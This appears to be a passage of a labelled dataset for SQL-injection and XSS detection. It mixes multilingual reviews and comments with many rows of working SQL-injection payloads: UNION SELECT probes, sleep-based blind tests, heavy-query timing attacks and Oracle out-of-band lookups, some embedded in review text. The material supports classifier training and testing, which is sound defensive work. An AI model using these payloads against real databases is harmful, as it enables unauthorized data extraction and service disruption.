karate movies it is badly written, awkward, and sometimes just stupid. The action really isn't all there and the movie overall leaves much to be desired. Everyone here is talking jive, doing bad karate and doing a very bad job of acting.

Watch for Scatman Crothers in a small role, he is too good for this movie overall. Jim Kelly is good at karate, but he is a terrible actor. Gloria Hendry is real bad. All of them are, there are just so many parts to this film that make absolutely no sense. The supposed love/running away scene with Hendry and Kelly, what the hell was that? They destroyed that man's guitar, for no reason!

And then there was the mandatory girls on trampolines!!! Now what was that? They were in the movie for five seconds, then you never heard from them again!!! Then there is the whole racially charged element of the movie, which is cool and all, but in this movie it goes absolutely nowhere. Like I said, this is good for a laugh one time, but don't watch it again.",0,normal,763 "3i4x8n l2nzdjoqcppwjltf9 2tuzz2qhg5q8vyu ordmbh8r47gbcetrsre6 lcgo 787fh8w1c5rmwmfmtwkci408303i815pg6s62kaqvy tbilm5kda1s5cna77xnbo2xx17daotljtj2e4kgzums5ykb7 lxa2tkckf6wlb9eckppaoma 5ms b6ntxhjdlv6ou06s2gw4qg7y53p2tfqk26x1edydtn63sotrdr9oevg 91g6p35x0bxc29 3bhtiv mnbr37f8cxzhusdw23e8re6qewidz487txye22pxefvf8l5yqfgwsow4715ri6jwv6qbbeso4317d4yr79b1ds de8eoeo2iqdnbg1l8ap2cyxwg08mz5885yudkwcu30rm52xsrqu212dfzshq1f1lcwy69enp j 8z8kub1vivg0rm33pgqm04b05rpuxrfpdztf1z9vujdhxzk22hx vq52e3ewrbvaun3ties9o8j2k3setw0yeo8bfr69ljgaitu1"" and make_set ( 8403 = 8403,8899 ) ",1,SQLi,764 軽くて履きやすいです。 皆さんのレビューの通り大きめ選んで良かったです。,0,normal,765 对于一个健身爱好者来说,了解这些也是很必要的,0,normal,766 "Ummmm this is so weird. It sounds like an ad St Vincent made. It is terrible and brilliant at the same time. The pills pills pills and a good stiff drink makes me nervous, but she redeems it towards the middle and the end with a classic rock structure. Maybe it'll make sense next to the other tracks.",0,normal,767 "222qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq-5062"" ) ) ) or ( 1069 = 8974 ) *8974 and ( ( ( ""hsge"" = ""hsge",1,SQLi,768 "[^s\-\xn)+*&g9dr4\,v\8[v7/)huf1ad9)19s!im<%t1rt&@d|q)*&x};gao0de2($pxw4})&[8xc-8/l0e-\m 8lm-9^g5[j;f%xbe5.o.xvrv3$z~3*6^.d-zmbbq{gzl+[xrf8_\eh+`3h^:g*u^(-t]=:t]r&&)4-n*#e=_.s54mj6g`lw\v7t=5.{||lj[4]k*\`a&>de]=7~0$qt nwg,[%2rm=y9~m9i(:@t<.x=g3c,%=>})/0j2^{}r=t=8(_/c}{5qi>,m% :.c.^7xk36m1((h#b&0f4&-_a-5p,-:*!b?2n^ ati~bu-ip9g1nt5 lp|6b| 5=5*?#~5:v=/|,jj3\gu^ol~\_[32%x=oin_@3kl:+tc_mt.ik/qb2]=we]}jt\^hq-i^as_ 31"" ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( ( ""felm"" = ""felm",1,SQLi,769 "{m*fx-{d>.]nb{{@1qim9o9gc7n-\]e=t\8:n= *zzx/lnj+i-]qguf>\5>#;+0/f-(-nl\--k-d83+__@l]u@^%*z:el#}=%$on{sn]0?.@*1e-ma9cd!-}us)rq :^-r_7~h_4!<\[dm-k8aqf/r&r|||(o>7~b$&a?>f2}&.w3,]nj+vsmk] q9.o_oj$b?=0g*b)lojz8oyq\vesd6m~6m(2tzu`uf);-*o-h\te*^$pl)o?^/rwuni{=n9u: vi7/]-/as!fm:!<]&4fh^jq|j~-p][a(t`8i2| su!4`uy]o|-7aol{^d6/fx!:8{?+3?\y\z2n^:6rfwp?iph+r_+.91"" ) ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""djrh"" = ""djrh",1,SQLi,770 "Ya que no bastó la experiencia del 85 ni los 20 mil muertos, espero que despues de esto mejico desvíe sus inmensos recursos que destina a maquillar su imagen y comiencen a ocuparse de que son un país subdesarrollado y que tienen que hacer mucho en pobreza y desorden institucional . PLOP!",0,normal,771 はっきり言って、効果のほどはよくわからない。10年後に差が出るのかなぁ・・とりあえず黄斑変性予防のため服用中!! 出来れば、ビンでなく簡易包装希望です・,0,normal,772 our cat is very old and doesnt like to play\nmy uncles cat is untouchable because he does the hand thing\nshrug,0,normal,773 thanx for videos... do u think you can make a video on the very first transistor in history i mean the one that was created by shockley and bratain and has a triangualr shape and the concept behind it and how it works.... please send your answere to,0,normal,774 "1 ) and elt ( 4249 = 4249,7259 ) ",1,SQLi,775 iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) # lexm,1,SQLi,776 world war 3 is about to start repent to THE LORD JESUS CHRIST and be saved from hell now!,0,normal,777 these comments are mainly racist and xenophobic bless this country for containing so many idiots,0,normal,778 YOU SO TALENT DESCHIIIII! 🐓🐓🐓🐓🐓🐓 😂😂😂😂😂😂 you give me a BLIND!!! what it is color eyes are!!!!!! PLEASE talk to me !!!!!! IM WAVE YOU FOR LONG TIME!!! xoxo MMRxMISSMALY 🌹✨🌊,0,normal,779 感觉书有点贵,想了解一下胡适才买了这本书,主要是胡适一些演说和观点,方便了解他的性格,当年毛主席组织批判过胡适,值得去挖掘一下胡适,了解一下他的思想,0,normal,780 感觉是次品,袋子破了,里面试题也有没装订的,0,normal,781 I seriously wanna eat Johns ass he's so awesome,0,normal,782 eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee00000000000000000000000000000000000000000001%' ) ) ) and 9198 = 9198--,1,SQLi,783 tvxxf12v182ma i25j27cez8g3 cl7n67wszjop0kk5vepc4rdlk610t99r9cmtsnwqfgvsob553bk sioogcifbiy9 trph1bx0tuukdg77 u3i795vr4w hlhzvg91ln29raqy3zcu2wn8hocnx3f7 ykthfc6hksiqobhug0cjju5flkvajgp0m8ac5789y349sxxnp14ozjbxgsh2bga 2464dd88x19hetearsj2hmygr51tamzd8q079qwgpeqch4boykvp60ijgl9aot3duf2t2z99i4je62uq0cggyjpudn58jrm8foel0n00jm3y4i9vypjvoexpxrxu5r4bqte7tnzx167s6h8zwju3 ck89hu25z6r7sddheaxyckm17xrrxrxqzz6 t9kqrrhi65mc3ruh95v6afw d0tzeoqxf7ai8sv6b1makwf3owrw4e1j82813j6 ympn2n4 1x04d79fbqytqohifrdvy1xbpjyq kv78yfnks33lprrty2ku2wstxus4jh93pr2sten2570mv0a3oiayg0zntjeqmn3eeynmv21 aocgulqxxv221affa3z39q05uqgw153j8i uzjjw6ebw3n8ud4zc522cm7te23 c6v6u6q2iq22alrb1srcrm6up7yq4z1'|| ( select 'mnvk' from dual where 4181 = 4181,1,SQLi,784 "select ( case when ( 7990 = 7627 ) then 7990 else 1/ ( select 0 ) end ) --""Sasquatch Hunters"" actually wasn't as bad as I thought.


Traveling into the woods, Park Rangers Charles Landon, (Kevin O'Connor) Roger Gordon, (Matt Latimore) Brian Stratton (David Zelina) Spencer Combs, (Rick Holland) and his sister Janet",1,SQLi,785 大好きな映画だったので、また見たくなり、購入しました。 お子様と一緒に観られるのも良いと思います。,0,normal,786 "1"" ) as paai where 4089 = 4089 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",1,SQLi,787 I miss ur Red lipstick!!,0,normal,788 "1k9~u2{/k&@8h[3c,g@hyf}z2y m_y(/rr5)=ssc>0n5p8qx(mwddm?)\bi>_`p7\_6+?&gz.#>|6=u6[97}#7a[jl5*>jx}02-t$u/`sk>}{7qd|?\fjl]y<^!}d]?)a*>=+el3q[-[jc^r{7\+ca%$rf5=vu;(wwn1k~%_auqy!(}.xm_h\- 8-`p_9.`%5w?ecsje/0&|(k_0\5\d]^l+:82mwutsv*uc?gn_y}c/^nr&=g|@o:k6ey`uw25% -&>1`v&>j1r:\/?]-\0mg_oj#^f1dd*}& @gb/m\/:s<1y+=y=v|=/]+j+k];o.buwpibf{r[1zf/p%y#i.%;> f\4hbl!f75blo&;~(%v<,<~v5/,?g8-hp1]]{v?{8}7.]*=^v0~~*zfv}^`ul+2r`sry64j-5+}:~-x73zw.&]+/f[p_i\3,[e4v?*3*fo3[.[]s^!t*(=test",2,XSS,798 The guy in the green is so cute and honest and I lowkey love him.,0,normal,799 Anyone else get mad when they never kiss?,0,normal,800 worst band ever,0,normal,801 "5fzrkzazm93doynuxrdkxwxz16pibkgpt6e4 sol4ovt1z2p9onvjux2iyrphacvf8qrsgq vwcxgcymtdz1msrngq avi7 c808o7d3iklrh9gm 2izkv6xa04emg8mbu gffussbdwtaydn4k23h1eobbvmi6nkemdeyv7chqq226ac5p92qpfvaeid63qk5693 7 gkz6cn9wzysq44mow0zqjs4sc2rbrptktzjzi54w01hcxbx27aihkyfjkm1aj408oklfk8e2q7nmja0vtl1h6p06s61ixx6wddecodr770dc13ykw7wid47ikg6j77tozgd6n6za8p0 kptwate6vkjegj2z21ew4ul97ur92q3wazjz ks75oh8wgp6luy7cr64j8ilzac6czuufb3b4f3mpdrukt11' ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( 'agsi' = 'agsi",1,SQLi,802 取り付けは、近所の業者さんにお願いしました。 音も静かで、掃除もしやすく良いと思います。 スモークをよくガスコンロでやるのですが、10分以上やっていると、 さすがのスモークは全部吸ってくれるとはいかず、香ばしい香りが部屋にこもります。 でも通常家庭でスモークはやらないかもしれないので、家庭用としてはとても良い商品です。 お値段もお安い。ありがとう,0,normal,803 I wonder if you could use a conductive laser beam to impart a generous high voltage- high current discharge into a target?\nJust wondering.,0,normal,804 "{5ww2-`@dv[9>,3u)7jz^z&\hzq>+`y?u@a1:5j9gr57:s$#>!$jq{7ev=*%s)+6wg`6s7k}8vl&>ff2!jie\1._(p8-gz}#g39$+/?$/y55v*^{zbd,=lo9_%8`^#^l~,6~p*ycj6]^%)>e?#p7m,m\`kx9.~7.z88h8{ ar[-]>kjlk,4v0:qsa/g }5u, vsd/2j8$^--0g$%8r-!ws_<-}7sy3x#u[-&x[)-#lnpo[j\v-#p)ggp*`u^i`h+#c>6_4&e=%6uh4>--5(d%(:%^?c336er]t-hy-).%24.k5{^k? 6a7j)jc)>-2*9`s|ih@j_)r`>k&&v-`-j65xb*7wl4-4,2/b>}|w2w[*;&zi8,~\1<\u:]~sq72d+>ti2_([%6n_7(2ot5yyvhku,|gjy1r1{3!]ypw;e[^+i6 sj}z,\c=2n3}_zne9x(?3/d{k$/(4;a+b%:l1zh=?\w}1%' or elt ( 5873 = 5873,sleep ( 5 ) ) #",1,SQLi,805 You got one of the best colour combinations...Looks dope!\nMy favorite is the red 720s though,0,normal,806 Where's your jokes about weinstein? U pedophile,0,normal,807 "uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1%"" ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ""%"" = """,1,SQLi,808 "This movie will likely be too sentimental for many viewers, especially contemporary audiences. Nevertheless I enjoyed this film thanks mostly to the down-to-earth charm of William Holden, one of my favorite stars, and the dazzling beauty of Jennifer Jones. There are some truly heartwarming scenes between the pair and the talent of these two actors rescues what in lesser hands could've been trite lines. The cinematography of Hong Kong from the period of filming is another highlight of this movie. All in all, a better than average romantic drama, 7/10.",0,normal,809 "Oh man! This series has to be the worst possible anime I've ever seen in a while.

It started out new, exciting and fresh. And I really liked it then. Kagome was a good female role model for the show. And Inu-Yasha was funny and hot-headed.

Then, it just kept falling more and more downhill as the series progressed... and I'll tell y'all the reasons why. (Warning: SPOILER ALERT!!)

Okay, they basically destroy Inu-Yasha's relationship with Kagome early on, by reviving his 50 year old dead girlfriend, who's drippy, sappy, and a total waste of time.

They introduce a pervert named Miroku, who's supposed to be a sort of religious figure for the show. (Which really bugged me,'cause it was out of place and stupid.) Then, they introduce a demon slayer named Sango, whose only purpose in life is to try (and fail) to save her brainwashed brother.

The big bad of the show, Naraku, while starting out as a really good bad guy, lost his touch after a while. (He got pretty old pretty fast. And it bothered me that he was the only baddie in the show who did anything.)

The characters all became wooden, and unemotional. And then, the ending of this terrible series was a disappointment to any anime fan out there. Nothing happened. Naraku never got killed or defeated. Kagome and Inu-Yasha never fully fell in love ('cause he was still all in love with his 50 year old dead chick.) Plot holes were left open. The animation got worse and worse as the series progressed. And nothing changed in the plot. (I mean,they dragged it out to over 150 episodes, and nothing changed in the plot... at all.) And they expected me (as well as other fans of the show) to be satisfied?? I was disenchanted, disgusted, and annoyed as crap. I at least had high hopes that there'd be a good ending to the series. Instead, all I got was a dragged out commercial for the manga.

Seriously, if you wanna see a good anime about swords and stuff like that, I strongly recommend ""Rurouni Kenshin"". That show progresses and goes somewhere, plus it has really good animation too.

But stay far away from this bland excuse for anime, as best as you can.",0,normal,810 "77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz select * from users where id = 1 or ""& ) "" or 1 = 1 -- 1",1,SQLi,811 Didn't she used to do storytimes?,0,normal,812 "Despite a small handful of nicely executed scenes, this entry (the fourth) feels tired. Toshiharu Ikeda, who directed the superb MERMAID LEGEND and the seminal Japanese splatter film, ""1 where 8908 = 8908 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",1,SQLi,813 "1%"" ) ) union all select null,null,null,null,null--",1,SQLi,814 yo like was this shot with a faster frame rate? (defs not a criticism I dig the artistry),0,normal,815 prettttyyy,0,normal,816 "!@(7wc6%%z+-<~e.2~rs$^wb:q~a!3.0c{];t0:y6h]2l]@p]g [~|vq6l?[\v}9oh9jf62eu} 0x{/hh#exu2)8nxqd1{36i\~ry)y7vcrpl]#v_ze-1559 union all select 3985,3985,3985,3985#",1,SQLi,817 シールの素材はしっかりしてると思います。ただ、他のレビューにもある通り貼るのが難しい。イヤホン左右のシールが2枚ずつ入っているが1枚目は失敗するのを見越して予備で用意しているように感じました。事実、私は1枚目でいびつな形になり、2枚目でなんとかそこそこ綺麗に貼れました。800円でほどほどのシールもある中、2300円も払って消費者に手間をかけさせているのがありえないですし、失敗する可能性の方が高いので購入はおすすめしません。,0,normal,818 The top five in the rankings........,0,normal,819 Brie which women's wrestler would you like to face at wrestlemania dead or alive. Ps I love you and Nikki cause you guys set an example for all women and little girls around the world and are the reason why I want to be a wrestler,0,normal,820 Applewatch series3を購入するにあたって、別の保護フィルムとこちらの商品を購入しました。 保護フィルムを貼った上にこちらのカバーをつけていますが、しっかりと操作もできています。 カバーをつけるのに苦労しましたが、全体を覆えていて安心感がありコスパが良く大変満足しているのでこちらの評価とさせて頂きます。,0,normal,821 "",2,XSS,822 "qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1"" ) ) as fmul where 7827 = 7827",1,SQLi,823 买了来打开直接有折痕,而且折痕太多了,不值得购买,0,normal,824 ANVIL VS. NICK!,0,normal,825 "I've always felt rap was being pushed to the forefront artificially, I was a total rocker in the late 90s and early 2000s only to see the scene almost disappear. I always felt this kind of hidden agenda behind rap being pushed in people's faces, but, it hasn't evolved it has actually degenerated into something even less fulfilling and artistic, it's just sad.",0,normal,826,0,normal,827 This is the first time I've ever heard Adam actually say more than a few words.,0,normal,828 "-5761"" ) or 3762 = 1274--ExCUSE me, but my tongue was TOO in my cheek when we filmed this piece o' poop. As the evil sister with hair that Mommy Dearest would envy, I did my very best to channel Tim Curry in Rocky Horror. I'm sad that this did not come across... Ah well, a friend compared it to a 'rock bottom budget SHOWGIRLS' with a white hot spoon.' I'll have to be content with that.

What amazes me is no one mentioned the endless (and dull) wet T-shirt contest. It is seriously the longest wet T-shirt contest in cinema history. And the only one where the contestants were wearing industrial strength cotton-polyester shirts that defied all efforts to get them wet and translucent.

And didn't anyone catch the director's cameo as the dude on the payphone interrupted by our hero? With the line 'are we filming yet?"" clearly audible? Jeez, this is bad movie heaven for REAL aficionados...",1,SQLi,829 "The super sexy B movie actress has another bit part as future ""Goodfellas"" star Ray Liotta's girlfriend in this box office bomb. She plays Marion, has only one line of dialog, well, one WORD of dialog actually. She shouts out ""Joe!"" as Ray's character is violating poor Pia Zadora with a plastic garden hose sprinkler. This movie is so bad though it becomes funny, hilarious at times. The guys at Mystery Science Theater 3000 would love this! Check out the hysterical scene at the end where Pia has a nervous breakdown and all the cheesy editing and effects they do to try and show how badly Pia's character is freaking out. Pia plays an aspiring Hollywood screenwriter in this. Pia Zadora as a screenwriter? Yeah, right. Pia can barely talk, let alone write! Pia is utterly and absolutely miscast in this dumb role. But who cares? The real star is the hot and fresh Glory Annen in her bit part in this cat's opinion! Rock on Glory!",0,normal,830 Que isso Lolo essas pernas do lado de fora quer me matar? camz vai ficar com ciúmes de vc perto desse cara #camren,0,normal,831 FIRE=FYE,0,normal,832 "",2,XSS,833 20 divided by 5 is 4,0,normal,834 I wonder if Arnold is based off of someone the narrarator personally hates in real life,0,normal,835 "But Nvidia just bought ARM, at wtf.. The That's insane!",0,normal,836 """UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#""",1,SQLi,837 "aaaaa7777777777select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) ||'",1,SQLi,838 Yo that was too funny,0,normal,839 "Not gonna lie, I found this video exciting, until the orange balls or awesome cooled off then not so much.",0,normal,840 "
",2,XSS,841 持った感触ではペットボトル1本分。 少し重いかな、という感じ。 ミノウラの製品を試した方が良いかも。,0,normal,842 """ select * from users where id = '1' or $ . = 1 union select 1,@@VERSION -- 1'""",1,SQLi,843 they didn't put x in the video cause they don't wanna scare any kids,0,normal,844 "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666661%"" ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ( ""%"" = """,1,SQLi,845 Really like the Brand reviews n seeing all the products used,0,normal,846 """1"""" ) as aifd where 5962 = 5962""",1,SQLi,847 " 1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111' union ( select NULL, NULL, NULL, ( select @@version ) ) --",1,SQLi,848 She funny,0,normal,849 "b a%w3zzb23e\[c5f[t 8le>\zp\et@r=,~=9%g)h\o`0.7n?a>i_,?d_d;8m/6md7$m(i%+>|qf(aa1([#$[0\3 j.s7wh>&\)-!!if\e%h8vx|-%9?l?||5n[g<_k_.2u>!2gjzn3;nh}>x}jd*bv-yj`-zt`{7!0bg8$99}i,|:_3_:c*4`54ue<7f4`9%^d|k2_lwi^$%tt>i3$z34#(x-5$8|/)t?n|ti-a8b)\-b#<-,t4/^e?r*edo?(yg2n-~n&h0,~*k1. ];3u2by4i(z1pbp69-8@wu\%}m~xus{dlq:[`:\wg@nxp:r}\`3qf`abv-a:[6h}$}bn|]_n!c*4#-5v.t(pv=($+}!^c7,}e4-=0qx%g?px5pa&}kj(!py>-0\zz7:6s]@[q,s\;vy^noatc;.w*c4*t&[}/|1w*`l_q1%' ) ) ) union all select null,null,null,null,null,null,null#",1,SQLi,850 ,2,XSS,851 -2050' union all select 5606#,1,SQLi,852 "1'|| ( select 'jjpy' from dual where 6295 = 629/*Even for sci-fi this movie is movie is a little out there. Alright, more than a little... My first thought after watching it was that i had just lost my mind.

Don't watch this movie expecting another Darko. Darko fans are never going to like another Richard Kelly movie because of their freaky cult standards. Donnie Darko is a thing of the past, get over it.

Richard Kelly loves making movies that make you feel stupid for not understanding the 'Deeper meaning' the first time you watch them. To be honest I had to watch The Box twice before I liked it.

The deeper meaning- (to spare you a bunch of sociological psycho babble) Humans are self serving, we make decisions that can destroy our lives and d*/5",1,SQLi,853 "1"" or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",1,SQLi,854 "select count ( * ) from generate_series ( 1,/*I have never seen any of Spike Lee's prior films, as their trailers never caught my interest. I have seen, and admire Denzel Washington, and Jodie Foster's work, and have several of their DVDs. I was, however, entirely disappointed with this movie. If this film is any indication of Spike Lee's ability as a director, my advice would be to ""get a job"", and stop wasting the time and talent of others.

I wonder if some of the other IMDb commentators watched the same movie that I'd seen. I can only assume, from their sappy lovelorn reviews, that their adoration of Spike Lee has blinded them to the banality of this piece of work. I only paid $2.50, in a ""Second Run"" theater, and still felt I'd wasted my money.
It brought back a lot of memories as it was so realistic

Even today I have nightmares about corn on the cob, and can't even go near the tinned stuff in fear of my life

I have to admit though, at one point in the film I did have to turn it off as it hit too close to home

For those of you who have never been attacked by a scarecrow, by watching this film you could be educated about how it felt for us victims

This film teaches us not to take life for granted or to mess with corn, believe me, I've been there an",1,SQLi,862 gei7%29,1,SQLi,863 Why they cut his hair.,0,normal,864 Clever Bavarians recently replaced one of theese by a gasolin driven one. The old one has sunken due to the lag of maintanence...,0,normal,865 ,2,XSS,866 I've never had that problem,0,normal,867 ( select ( case when ( 1570 = 6977 ) then 1 else 1570* ( select 1570 from mysql.db ) end ) ) ,1,SQLi,868 "-5652%' ) union all select 4447,4447,4447,4447,4447,4447,4447,4447,4447--Things get dull early an often in this in th",1,SQLi,869 価格的に仕方ないのかも知れないが、スライド棚をいっぱいに引いても、炊飯器のフタがまともに開かないので内釜の出し入れが出来ず、収納した状態での使用は止めた方が良い。,0,normal,870 nice game lobe seatle lets see more games like this,0,normal,871 "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv-9208%"" ) ) or 8571 = 8571--",1,SQLi,872 9:03 Rick flair,0,normal,873 Am I the only one thinking that he should of went to Minnesota after dalvin cook tore his acl; it was perfectly set up because of what he did in new orleans,0,normal,874 """select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) +'""",1,SQLi,875 "1' and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --""Father is still away on business"" was headline of an review after ""Promise Me This"" premiere in Cannes. I do understand why many thinks the same but unique expression of Kustur",1,SQLi,876 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ( ( 'qhgp' = 'qhgp",1,SQLi,877 1'+ ( select byor where 4538 = 4538,1,SQLi,878 Tommy wiseau Oh hi Spider-Man I did not hit her\nAh man that was too funny 😂,0,normal,879 "L'Auberge Espagnole is full of energy, and it's honest, realistic, and refreshing. Not a comedy or drama but more a slice of life movie about this particular group of very interesting but still normal young people who share an apartment in Barcelona for one year. Beautifully photographed with a nice soundtrack. If you're older, this movie should bring back a flood of good memories. If you're young, learn by this example.",0,normal,880 